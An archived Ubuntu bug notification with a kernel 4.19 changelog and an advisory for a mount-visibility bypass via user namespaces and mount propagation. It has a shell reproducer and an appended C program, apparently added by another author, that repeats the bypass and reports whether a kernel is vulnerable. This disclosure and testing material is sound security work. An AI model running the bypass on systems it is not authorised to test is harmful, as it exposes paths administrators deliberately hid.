
group.of.nepali.translators team mailing list archive

[Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation

This bug was fixed in the package linux - 4.19.0-12.13

---------------
linux (4.19.0-12.13) disco; urgency=medium

  * linux: 4.19.0-12.13 -proposed tracker (LP: #1813664)

  * kernel oops in bcache module (LP: #1793901)
    - SAUCE: bcache: never writeback a discard operation

  * Disco update: 4.19.18 upstream stable release (LP: #1813611)
    - ipv6: Consider sk_bound_dev_if when binding a socket to a v4 mapped address
    - mlxsw: spectrum: Disable lag port TX before removing it
    - mlxsw: spectrum_switchdev: Set PVID correctly during VLAN deletion
    - net: dsa: mv88x6xxx: mv88e6390 errata
    - net, skbuff: do not prefer skb allocation fails early
    - qmi_wwan: add MTU default to qmap network interface
    - ipv6: Take rcu_read_lock in __inet6_bind for mapped addresses
    - net: clear skb->tstamp in bridge forwarding path
    - netfilter: ipset: Allow matching on destination MAC address for mac and
      ipmac sets
    - gpio: pl061: Move irq_chip definition inside struct pl061
    - drm/amd/display: Guard against null stream_state in set_crc_source
    - drm/amdkfd: fix interrupt spin lock
    - ixgbe: allow IPsec Tx offload in VEPA mode
    - platform/x86: asus-wmi: Tell the EC the OS will handle the display off
      hotkey
    - e1000e: allow non-monotonic SYSTIM readings
    - usb: typec: tcpm: Do not disconnect link for self powered devices
    - selftests/bpf: enable (uncomment) all tests in test_libbpf.sh
    - of: overlay: add missing of_node_put() after add new node to changeset
    - writeback: don't decrement wb->refcnt if !wb->bdi
    - serial: set suppress_bind_attrs flag only if builtin
    - bpf: Allow narrow loads with offset > 0
    - ALSA: oxfw: add support for APOGEE duet FireWire
    - x86/mce: Fix -Wmissing-prototypes warnings
    - MIPS: SiByte: Enable swiotlb for SWARM, LittleSur and BigSur
    - crypto: ecc - regularize scalar for scalar multiplication
    - arm64: perf: set suppress_bind_attrs flag to true
    - drm/atomic-helper: Complete fake_commit->flip_done potentially earlier
    - clk: meson: meson8b: fix incorrect divider mapping in cpu_scale_table
    - samples: bpf: fix: error handling regarding kprobe_events
    - usb: gadget: udc: renesas_usb3: add a safety connection way for
      forced_b_device
    - fpga: altera-cvp: fix probing for multiple FPGAs on the bus
    - selinux: always allow mounting submounts
    - ASoC: pcm3168a: Don't disable pcm3168a when CONFIG_PM defined
    - scsi: qedi: Check for session online before getting iSCSI TLV data.
    - drm/amdgpu: Reorder uvd ring init before uvd resume
    - rxe: IB_WR_REG_MR does not capture MR's iova field
    - efi/libstub: Disable some warnings for x86{,_64}
    - jffs2: Fix use of uninitialized delayed_work, lockdep breakage
    - clk: imx: make mux parent strings const
    - pstore/ram: Do not treat empty buffers as valid
    - media: uvcvideo: Refactor teardown of uvc on USB disconnect
    - powerpc/xmon: Fix invocation inside lock region
    - powerpc/pseries/cpuidle: Fix preempt warning
    - media: firewire: Fix app_info parameter type in avc_ca{,_app}_info
    - ASoC: use dma_ops of parent device for acp_audio_dma
    - media: venus: core: Set dma maximum segment size
    - staging: erofs: fix use-after-free of on-stack `z_erofs_vle_unzip_io'
    - net: call sk_dst_reset when set SO_DONTROUTE
    - scsi: target: use consistent left-aligned ASCII INQUIRY data
    - scsi: target/core: Make sure that target_wait_for_sess_cmds() waits long
      enough
    - selftests: do not macro-expand failed assertion expressions
    - arm64: kasan: Increase stack size for KASAN_EXTRA
    - clk: imx6q: reset exclusive gates on init
    - arm64: Fix minor issues with the dcache_by_line_op macro
    - bpf: relax verifier restriction on BPF_MOV | BPF_ALU
    - kconfig: fix file name and line number of warn_ignored_character()
    - kconfig: fix memory leak when EOF is encountered in quotation
    - mmc: atmel-mci: do not assume idle after atmci_request_end
    - btrfs: volumes: Make sure there is no overlap of dev extents at mount time
    - btrfs: alloc_chunk: fix more DUP stripe size handling
    - btrfs: fix use-after-free due to race between replace start and cancel
    - btrfs: improve error handling of btrfs_add_link
    - tty/serial: do not free trasnmit buffer page under port lock
    - perf intel-pt: Fix error with config term "pt=0"
    - perf tests ARM: Disable breakpoint tests 32-bit
    - perf svghelper: Fix unchecked usage of strncpy()
    - perf parse-events: Fix unchecked usage of strncpy()
    - perf vendor events intel: Fix Load_Miss_Real_Latency on SKL/SKX
    - netfilter: ipt_CLUSTERIP: check MAC address when duplicate config is set
    - netfilter: ipt_CLUSTERIP: remove wrong WARN_ON_ONCE in netns exit routine
    - netfilter: ipt_CLUSTERIP: fix deadlock in netns exit routine
    - x86/topology: Use total_cpus for max logical packages calculation
    - dm crypt: use u64 instead of sector_t to store iv_offset
    - dm kcopyd: Fix bug causing workqueue stalls
    - perf stat: Avoid segfaults caused by negated options
    - tools lib subcmd: Don't add the kernel sources to the include path
    - dm snapshot: Fix excessive memory usage and workqueue stalls
    - perf cs-etm: Correct packets swapping in cs_etm__flush()
    - perf tools: Add missing sigqueue() prototype for systems lacking it
    - perf tools: Add missing open_memstream() prototype for systems lacking it
    - quota: Lock s_umount in exclusive mode for Q_XQUOTA{ON,OFF} quotactls.
    - clocksource/drivers/integrator-ap: Add missing of_node_put()
    - dm: Check for device sector overflow if CONFIG_LBDAF is not set
    - Bluetooth: btusb: Add support for Intel bluetooth device 8087:0029
    - ALSA: bebob: fix model-id of unit for Apogee Ensemble
    - sysfs: Disable lockdep for driver bind/unbind files
    - IB/usnic: Fix potential deadlock
    - scsi: mpt3sas: fix memory ordering on 64bit writes
    - scsi: smartpqi: correct lun reset issues
    - ath10k: fix peer stats null pointer dereference
    - scsi: smartpqi: call pqi_free_interrupts() in pqi_shutdown()
    - scsi: megaraid: fix out-of-bound array accesses
    - iomap: don't search past page end in iomap_is_partially_uptodate
    - ocfs2: fix panic due to unrecovered local alloc
    - mm/page-writeback.c: don't break integrity writeback on ->writepage() error
    - mm/swap: use nr_node_ids for avail_lists in swap_info_struct
    - userfaultfd: clear flag if remap event not enabled
    - mm, proc: be more verbose about unstable VMA flags in /proc/<pid>/smaps
    - iwlwifi: mvm: Send LQ command as async when necessary
    - Bluetooth: Fix unnecessary error message for HCI request completion
    - ipmi: fix use-after-free of user->release_barrier.rda
    - ipmi: msghandler: Fix potential Spectre v1 vulnerabilities
    - ipmi: Prevent use-after-free in deliver_response
    - ipmi:ssif: Fix handling of multi-part return messages
    - ipmi: Don't initialize anything in the core until something uses it
    - Linux 4.19.18

  * tls selftest failures/hangs on i386 (LP: #1813607)
    - [Config] CONFIG_TLS=n for i386

  * Intel XL710 - i40e driver does not work with kernel 4.15 (Ubuntu 18.04)
    (LP: #1779756)
    - i40e: prevent overlapping tx_timeout recover

  * Disco update: 4.19.17 upstream stable release (LP: #1813016)
    - tty/ldsem: Wake up readers after timed out down_write()
    - tty: Don't hold ldisc lock in tty_reopen() if ldisc present
    - can: gw: ensure DLC boundaries after CAN frame modification
    - netfilter: nf_conncount: replace CONNCOUNT_LOCK_SLOTS with CONNCOUNT_SLOTS
    - netfilter: nf_conncount: split gc in two phases
    - netfilter: nf_conncount: restart search when nodes have been erased
    - netfilter: nf_conncount: merge lookup and add functions
    - netfilter: nf_conncount: move all list iterations under spinlock
    - netfilter: nf_conncount: speculative garbage collection on empty lists
    - netfilter: nf_conncount: fix argument order to find_next_bit
    - mmc: sdhci-msm: Disable CDR function on TX
    - Revert "scsi: target: iscsi: cxgbit: fix csk leak"
    - scsi: target: iscsi: cxgbit: fix csk leak
    - scsi: target: iscsi: cxgbit: fix csk leak
    - arm64/kvm: consistently handle host HCR_EL2 flags
    - arm64: Don't trap host pointer auth use to EL2
    - ipv6: fix kernel-infoleak in ipv6_local_error()
    - net: bridge: fix a bug on using a neighbour cache entry without checking its
      state
    - packet: Do not leak dev refcounts on error exit
    - tcp: change txhash on SYN-data timeout
    - tun: publish tfile after it's fully initialized
    - lan743x: Remove phy_read from link status change function
    - smc: move unhash as early as possible in smc_release()
    - r8169: don't try to read counters if chip is in a PCI power-save state
    - bonding: update nest level on unlink
    - ip: on queued skb use skb_header_pointer instead of pskb_may_pull
    - r8169: load Realtek PHY driver module before r8169
    - crypto: sm3 - fix undefined shift by >= width of value
    - crypto: caam - fix zero-length buffer DMA mapping
    - crypto: authencesn - Avoid twice completion call in decrypt path
    - crypto: ccree - convert to use crypto_authenc_extractkeys()
    - crypto: bcm - convert to use crypto_authenc_extractkeys()
    - crypto: authenc - fix parsing key with misaligned rta_len
    - crypto: talitos - reorder code in talitos_edesc_alloc()
    - crypto: talitos - fix ablkcipher for CONFIG_VMAP_STACK
    - xen: Fix x86 sched_clock() interface for xen
    - Revert "btrfs: balance dirty metadata pages in btrfs_finish_ordered_io"
    - btrfs: wait on ordered extents on abort cleanup
    - Yama: Check for pid death before checking ancestry
    - scsi: core: Synchronize request queue PM status only on successful resume
    - scsi: sd: Fix cache_type_store()
    - mips: fix n32 compat_ipc_parse_version
    - MIPS: BCM47XX: Setup struct device for the SoC
    - MIPS: lantiq: Fix IPI interrupt handling
    - drm/i915/gvt: Fix mmap range check
    - OF: properties: add missing of_node_put
    - mfd: tps6586x: Handle interrupts on suspend
    - media: v4l: ioctl: Validate num_planes for debug messages
    - RDMA/nldev: Don't expose unsafe global rkey to regular user
    - RDMA/vmw_pvrdma: Return the correct opcode when creating WR
    - kbuild: Disable LD_DEAD_CODE_DATA_ELIMINATION with ftrace & GCC <= 4.7
    - net: dsa: realtek-smi: fix OF child-node lookup
    - pstore/ram: Avoid allocation and leak of platform data
    - arm64: kaslr: ensure randomized quantities are clean to the PoC
    - arm64: dts: marvell: armada-ap806: reserve PSCI area
    - Disable MSI also when pcie-octeon.pcie_disable on
    - fix int_sqrt64() for very large numbers
    - omap2fb: Fix stack memory disclosure
    - media: vivid: fix error handling of kthread_run
    - media: vivid: set min width/height to a value > 0
    - bpf: in __bpf_redirect_no_mac pull mac only if present
    - ipv6: make icmp6_send() robust against null skb->dev
    - LSM: Check for NULL cred-security on free
    - media: vb2: vb2_mmap: move lock up
    - sunrpc: handle ENOMEM in rpcb_getport_async
    - netfilter: ebtables: account ebt_table_info to kmemcg
    - block: use rcu_work instead of call_rcu to avoid sleep in softirq
    - selinux: fix GPF on invalid policy
    - blockdev: Fix livelocks on loop device
    - sctp: allocate sctp_sockaddr_entry with kzalloc
    - tipc: fix uninit-value in in tipc_conn_rcv_sub
    - tipc: fix uninit-value in tipc_nl_compat_link_reset_stats
    - tipc: fix uninit-value in tipc_nl_compat_bearer_enable
    - tipc: fix uninit-value in tipc_nl_compat_link_set
    - tipc: fix uninit-value in tipc_nl_compat_name_table_dump
    - tipc: fix uninit-value in tipc_nl_compat_doit
    - block/loop: Don't grab "struct file" for vfs_getattr() operation.
    - block/loop: Use global lock for ioctl() operation.
    - loop: Fold __loop_release into loop_release
    - loop: Get rid of loop_index_mutex
    - loop: Push lo_ctl_mutex down into individual ioctls
    - loop: Split setting of lo_state from loop_clr_fd
    - loop: Push loop_ctl_mutex down into loop_clr_fd()
    - loop: Push loop_ctl_mutex down to loop_get_status()
    - loop: Push loop_ctl_mutex down to loop_set_status()
    - loop: Push loop_ctl_mutex down to loop_set_fd()
    - loop: Push loop_ctl_mutex down to loop_change_fd()
    - loop: Move special partition reread handling in loop_clr_fd()
    - loop: Move loop_reread_partitions() out of loop_ctl_mutex
    - loop: Fix deadlock when calling blkdev_reread_part()
    - loop: Avoid circular locking dependency between loop_ctl_mutex and bd_mutex
    - loop: Get rid of 'nested' acquisition of loop_ctl_mutex
    - loop: Fix double mutex_unlock(&loop_ctl_mutex) in loop_control_ioctl()
    - loop: drop caches if offset or block_size are changed
    - drm/fb-helper: Ignore the value of fb_var_screeninfo.pixclock
    - selftests: Fix test errors related to lib.mk khdr target
    - media: vb2: be sure to unlock mutex on errors
    - nbd: Use set_blocksize() to set device blocksize
    - Linux 4.19.17

  * Enable sound card power saving by default (LP: #1804265)
    - [Config] CONFIG_SND_HDA_POWER_SAVE_DEFAULT=1

  * Fix non-working QCA Rome Bluetooth after S3 (LP: #1812812)
    - USB: Add new USB LPM helpers
    - USB: Consolidate LPM checks to avoid enabling LPM twice

  * [SRU] Fix Xorg crash with nomodeset when BIOS enable 64-bit fb addr
    (LP: #1812797)
    - vgaarb: Add support for 64-bit frame buffer address
    - vgaarb: Keep adding VGA device in queue

  * bluetooth controller not detected with 4.15 kernel (LP: #1810797)
    - SAUCE: btqcomsmd: introduce BT_QCOMSMD_HACK
    - [Config] arm64: snapdragon: BT_QCOMSMD_HACK=y

  * [19.04 FEAT] Enable virtio-gpu for s390x (LP: #1799467)
    - [Config] enable virtio-gpu for s390x

  * Miscellaneous Ubuntu changes
    - Revert "UBUNTU: SAUCE: selftests: disable some failing networking tests"
    - SAUCE: selftests: net: replace AF_MAX with INT_MAX in socket.c
    - SAUCE: selftests/ftrace: Fix tab expansion in trace_marker snapshot trigger
      test
    - update dkms package versions

  * Miscellaneous upstream changes
    - selftests/ftrace: Fix checkbashisms errors
    - selftests/powerpc/pmu: Link ebb tests with -no-pie

 -- Seth Forshee <seth.forshee@xxxxxxxxxxxxx>  Mon, 28 Jan 2019 15:38:30 -0600

** Changed in: linux (Ubuntu Disco)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1789161

Title:
  Bypass of mount visibility through userns + mount propagation

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  Fix Released
Status in linux source package in Disco:
  Fix Released

Bug description:
  [Impact]

  Jonathan Calmels from NVIDIA reported that he's able to bypass the
  mount visibility security check in place in the Linux kernel by using
  a combination of the unbindable property along with the private mount
  propagation option to allow an unprivileged user to see a path which
  was purposefully hidden by the root user.

  [Test Case]

  Reproducer:
  # Hide a path to all users using a tmpfs
  root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
  root@castiana:~#

  # As an unprivileged user, unshare user namespace and mount namespace
  stgraber@castiana:~$ unshare -U -m -r

  # Confirm the path is still not accessible
  root@castiana:~# ls /sys/devices/

  # Make /sys recursively unbindable and private
  root@castiana:~# mount --make-runbindable /sys
  root@castiana:~# mount --make-private /sys

  # Recursively bind-mount the rest of /sys over to /mnt
  root@castiana:~# mount --rbind /sys/ /mnt

  # Access our hidden /sys/devices as an unprivileged user
  root@castiana:~# ls /mnt/devices/
  breakpoint  cpu  cstate_core  cstate_pkg  i915  intel_pt  isa  kprobe  LNXSYSTM:00  msr  pci0000:00  platform  pnp0  power  software  system  tracepoint  uncore_arb  uncore_cbox_0  uncore_cbox_1  uprobe  virtual

  [Regression Potential]

  Low. The fixes are relatively simple. Regressions would most likely be
  specific to software utilizing user namespaces + mount propagation
  which is a small (but often important) portion of the Ubuntu archive.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions
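The [Test Case] above as a self-contained C check, added here as an example; it is not code from the bug report, from the reporter, or from the Ubuntu or upstream kernel patches. It performs the same steps with unshare(2) and mount(2) after root has hidden /sys/devices with a tmpfs as in the bug, and reports whether the hidden directory's contents show up in the rbind copy. The default paths, the /tmp scratch directory, and the parse_mountinfo_line helper (for confirming from /proc/self/mountinfo which mounts ended up unbindable, shared, slave or private inside the namespace) are my additions. The EPERM outcome on a fixed kernel reflects my understanding of the upstream fix, which refuses to copy a mount that is both unbindable and locked; the bug text itself does not describe the fix.

```c
/* Added example for LP #1789161, not code from the bug report or from the
 * Ubuntu/upstream patches. Performs the [Test Case] steps with unshare(2)
 * and mount(2) and reports whether a path root hid with an overmount shows
 * through an unprivileged rbind copy. Assumed setup, as in the bug: root has
 * run `mount -t tmpfs tmpfs /sys/devices`; paths and /tmp are assumptions. */
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <unistd.h>

struct mountinfo_entry {
    char mountpoint[256];
    int shared, slave, unbindable; /* shared:N, master:N, unbindable tags */
};

/* Parse one /proc/self/mountinfo line (proc(5)). Propagation tags sit in the
 * optional fields between field 6 and the "-" separator; no tag means
 * private. Returns 0, or -1 if the line is malformed. */
int parse_mountinfo_line(const char *line, struct mountinfo_entry *e)
{
    char buf[1024], *save, *tok;
    int field = 0;
    memset(e, 0, sizeof(*e));
    if (strlen(line) >= sizeof(buf))
        return -1;
    strcpy(buf, line);
    for (tok = strtok_r(buf, " \n", &save); tok;
         tok = strtok_r(NULL, " \n", &save), field++) {
        if (field == 4)
            snprintf(e->mountpoint, sizeof(e->mountpoint), "%s", tok);
        if (field < 6)
            continue;
        if (strcmp(tok, "-") == 0)
            return 0;                       /* separator reached: complete */
        if (!strncmp(tok, "shared:", 7))      e->shared = 1;
        else if (!strncmp(tok, "master:", 7)) e->slave = 1;
        else if (!strcmp(tok, "unbindable"))  e->unbindable = 1;
    }
    return -1;                              /* too few fields or no "-" */
}

/* Entries in a directory other than "." and "..", or -1 on error. */
int count_dir_entries(const char *path)
{
    DIR *d = opendir(path);
    struct dirent *de;
    int n = 0;
    if (!d)
        return -1;
    while ((de = readdir(d)) != NULL)
        n += strcmp(de->d_name, ".") && strcmp(de->d_name, "..");
    closedir(d);
    return n;
}

static int report(const char *msg, int rc) { puts(msg); return rc; }

int main(int argc, char **argv)
{
    const char *parent = argc > 1 ? argv[1] : "/sys";         /* tree to rbind */
    const char *hidden = argc > 2 ? argv[2] : "/sys/devices"; /* root's overmount */
    char target[] = "/tmp/lp1789161.XXXXXX", copy[512];
    int before, after;

    if (strncmp(hidden, parent, strlen(parent)) != 0)
        return report("hidden path must lie under the rbind tree", 2);
    before = count_dir_entries(hidden);
    printf("%s: %d entries before (0 if root hid it)\n", hidden, before);
    /* `unshare -U -m`; no uid map needed, mount(2) only checks CAP_SYS_ADMIN */
    if (!mkdtemp(target) || unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
        perror("setup");
        return 2;
    }
    /* --make-runbindable, then --make-private on the top mount. */
    if (mount(NULL, parent, NULL, MS_REC | MS_UNBINDABLE, NULL) < 0 ||
        mount(NULL, parent, NULL, MS_PRIVATE, NULL) < 0) {
        perror("mount(propagation)");
        return 2;
    }
    /* --rbind: an unfixed kernel skips the unbindable tmpfs while copying the
     * tree, so the copy exposes what it covered. With the fix, copying a mount
     * that is both unbindable and locked (inherited) fails with EPERM. */
    if (mount(parent, target, NULL, MS_BIND | MS_REC, NULL) < 0) {
        printf("rbind refused (%s): kernel looks fixed\n", strerror(errno));
        return 0;
    }
    snprintf(copy, sizeof(copy), "%s%s", target, hidden + strlen(parent));
    after = count_dir_entries(copy);
    printf("%s: %d entries after\n", copy, after);
    if (after > before)
        return report("VULNERABLE: hidden contents visible via the rbind copy", 1);
    return report("not reproduced", 0);
}
```

Run it as an unprivileged user on a host where unprivileged user namespaces are enabled, after root has done the tmpfs mount from the bug. Exit status 1 means the bypass reproduced (the rbind copy shows entries the overmount was hiding); 0 means the rbind was refused or nothing extra became visible; 2 is a setup failure. Feeding the lines of /proc/self/mountinfo from inside the namespace to parse_mountinfo_line is a quick way to verify that the tmpfs really is marked unbindable before the rbind, which is the precondition the bug depends on.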